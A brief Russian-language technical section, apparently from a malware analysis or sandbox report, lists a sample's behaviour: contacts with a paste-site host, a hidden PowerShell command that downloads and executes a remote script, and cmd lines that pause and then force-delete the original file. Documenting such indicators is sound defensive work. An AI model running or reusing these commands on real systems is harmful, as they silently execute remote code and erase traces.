Техническая информация
- https://paste-bin.xyz/raw/990456
- 'pa###-bin.xyz':443
- 'pa###-bin.xyz':443
- DNS ASK pa###-bin.xyz
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EP b -w hidden -noexit -C IEX((new-object net.webclient).downloadstring('https://paste-bin.xyz/raw/990456'))' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 5 && del /F /Q "<Полный путь к файлу>"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 5 && del /F /Q "<Полный путь к файлу>"
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 5